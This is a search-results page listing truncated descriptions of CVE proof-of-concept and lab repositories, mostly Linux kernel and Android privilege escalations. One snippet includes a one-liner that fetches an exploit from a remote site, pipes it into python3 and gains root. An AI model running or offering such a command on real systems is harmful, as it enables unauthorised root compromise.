15589 matches found
CVE-2024-30896
CVE-2024-30896 Summary A business logic flaw in influxdb allows users who own a valid allAccess token to escalate their privileges at operator level by listing current authorization tokens. Scenario Attacker might be a user which was gained access by an administrator via an allAccess token only...
ServiceCheater
ServiceCheater Poc of CVE-2020-0113 & CVE-2020-0108 Analysis of Android Foreground Service Privilege Escalation Vulnerability Vulnerability Background In the AOSP August 2020 patch, a vulnerability in the framework layer AMS was disclosed, numbered CVE-2020-0108, rated high, and another numbered...
CVE-2026-31431-CopyFail-Linux-PrivEsc
CVE-2026-31431 CopyFail Linux Local Privilege Escalation A demonstration and explanation of CVE-2026-31431, the Linux Kernel Copy Fail Local Privilege Escalation vulnerability. The vulnerability allows for files opened with read permission to have data overwritten in the page cache. This reposito...
Dirty-Frag-CVE-2026-43284
Dirty Frag CVE-2026-43284 and CVE-2026-43500 Exploit Reproduction and Detection Lab for a Linux kernel local privilege escalation chain. Status: VERIFIED. I completed the reproduction, the fileless verification, and the syscall-level detection in the lab kernel 6.18.9+kali-amd64. This document is...
CVE-2019-11043
CVE-2019-11043 Vulnerability Description When Nginx's fastcgisplitpathinfo processes requests containing %0a, it encounters a newline \n causing PATHINFO to be empty. Meanwhile, php-fpm has a logic flaw when handling empty PATHINFO. An attacker can achieve remote code execution through careful...
CVE-2026-46300
🛡️ CVE-2026-46300 - Fragnesia A Clean & Deadly Page-Cache Attack Variant of the "Dirty Frag" family 📌 Overview CVE-2026-46300 Fragnesia is a high-severity logic flaw in the Linux kernel's socket buffer handling skbtrycoalesce within the XFRM/ESP-in-TCP subsystem espintcp ULP. An unprivileged local...
pwnage24mtk
pwnage24mtk Cert exploit for MTK devices.There is a logic flaw in MTK cert verification process.Similar to CVE-2023-20696. May be patched at June Disclaimer This project is only used for researching. Make sure you get authorized before you use it. Not allowed for illegal use. It is not allowed to...
poc-CVE-2026-0073
CVE-2026-0073 PoC Wireless ADB TLS Auth Bypass This directory contains a Python proof of concept for CVE-2026-0073. The script is generated using AI-assisted code generation techniques. Summary CVE-2026-0073 is a logic issue in ADB daemon certificate verification adbdtlsverifycert in auth.cpp. Th...
Copy-Fail-CVE-2026-31431-Lab
Copy Fail CVE-2026-31431 — Exploit Reproduction & Detection Lab This repository documents the end-to-end reproduction, detection engineering, and incident response for CVE-2026-31431 "Copy Fail" , a critical Linux kernel local privilege escalation vulnerability affecting kernels 4.14 through...
CVE-2026-78904-Digital-Dinar-Drain
CVE-2026-78904 — 数字迪拉姆盗取 CBDC 发行 API — 逻辑缺陷(无限铸造) 字段| 值 ---|--- 严重性| 9.8(严重) 攻击向量| 网络 受影响版本| 2.1.0 – 2.1.3 发现者| 𝕍𝕠𝕤𝕤🥷 描述 CBDC 发行 API 中的一个严重逻辑缺陷允许具有低级别访问权限的攻击者操纵铸造和赎回端点。这能够在未经授权的情况下创建或销毁 CBDC 单位。 影响 未经授权铸造 CBDC 单位 操纵赎回请求 无限铸造攻击向量 缓解措施 升级至 CBDC 发行 API 2.1.4 或更高版本 对铸造/赎回端点实施速率限制 对所有管理操作强制执行多因素授权 时间线...
CVE-2025-29448
CVE-2025-29448 Description booking logic flaw in Easy!Appointments v1.5.1 allows unauthenticated attackers to create appointments with excessively long durations, causing a denial of service by blocking all future booking availability. Steps to Reproduce 1. Intercept an appointment booking reques...
research-cve-2026-85649
CVE-2026-85649 | Holloway Chew, Kean Ho 的知识研究 2026年8月26日,在 Holloway Chew, Kean Ho 的 Actualizer v1.2.0 及以下版本中报告了一个安全漏洞(CVSS:7.9,高危7)。该工具假定 mkpasswd 命令始终能生成有效的 yescrypt 密码哈希。在已安装的 mkpasswd 不支持 yescrypt 的情况下,该命令反而会失败并产生空值。由于此逻辑缺陷,空值未经检查便被传递,最终成为构建镜像中的密码。因此,下游镜像的 root 和 alpha 用户账户均允许无密码登录。这意味着 v1.2.0...
CVE-2026-82982
The Approval app's approve/reject endpoint contained a bypass in its etag freshness check , which is designed to prevent an approver from approving or rejecting a file whose contents changed after review. The backend only enforced the check when the etag parameter was present and non-empty; an at...
CVE-2025-31161
CVE-2025-31161 Warning: This tool is for authorized security testing and educational purposes only. Unauthorized use against systems you do not have explicit permission to test is illegal. Overview This tool is a proof-of-concept PoC for CVE-2025-31161 , a critical authentication bypass...
CVE-2026-31431-copy-fail
Copy Fail 大多数 Linux LPE 需要竞态窗口或内核特定偏移。 Copy Fail 是一个直线逻辑缺陷——两者都不需要。 同一个 732 字节的 Python 脚本即可让自 2017 年以来发布的每个 Linux 发行版获得 root 权限。 快速运行: curl https://copy.fail/exp | python3 && su id uid=0root gid=1002user groups=1002user...
CVE-2026-31431-PoC
Copy Fail - Python 3.9 PoC(CVE-2026-31431) 公开的 Copy Fail 漏洞利用程序与 Python 3.9 不兼容,本版本兼容 Python 3.9。 原始版本通过将不可用的 os.splice 替换为轻量级 ctypes 填充实现进行了修改。 🚨 法律免责声明(CFAA 及相关法律) 本软件仅用于教育和授权安全研究目的。 下载、使用或查看此代码即表示您同意以下条款: 您仅 可在您拥有 的系统上,或已获得所有者明确书面授权 的系统上使用此漏洞利用程序。 未经许可对任何系统进行未授权访问、修改或使用是非法的 ,并可能违反:...
copy-fail-CVE-2026-31431
CVE-2026-31431 — Copy Fail 732 bytes. Any distro. Root. A straight-line logic flaw in the Linux kernel's authencesn cryptographic template enables an unprivileged local user to perform a precise, controlled 4-byte write into the page cache of any readable file — including setuid binaries. No race...
copy-fail-cve-2026-31431
Copy Fail - CVE-2026-31431 本仓库提供了公开 Copy Fail PoC 的 Go 移植版本,以及一个可复现的多架构 Linux 二进制构建流水线。 Copy Fail(CVE-2026-31431)是 Linux 内核中 authencesn 的一个逻辑缺陷,它能够通过 AFALG + splice 实现对页缓存数据确定性的 4 字节写入。 负责任使用 请仅在您被明确授权测试的环境中使用本项目。请勿针对您不拥有或未经书面许可评估的系统运行此 PoC。 快速测试(无需构建) 如果您想立即测试而无需从源码构建,请下载发布二进制文件并运行:...
copyfail-go
CopyFail Go 大多数 Linux LPE 漏洞需要竞态窗口或特定内核的偏移量。Copy Fail 是一个直线型逻辑缺陷——两者都不需要。同一个 732 字节的 Python 脚本 静态 Go 二进制即可攻破自 2017 年以来发布的所有 Linux 发行版。 CVE-2026-31431 的 Go 实现。适用于你需要静态二进制且不依赖 Python 的情况。 更多信息请参阅 copy.fail。 交互式 Shell root@kitploit: Get the binary to your Linux host with code execution exercise for...
CVE-2026-16141
OpenBMC's IPMI implementation, phosphor-net-ipmid, contains a logic flaw in which an unauthenticated client can force the RAKP Message 1 handler to return before it overwrites the authentication object's constructor defaults. The IPMI service then accepts a RAKP Message 3 whose HMAC is computed...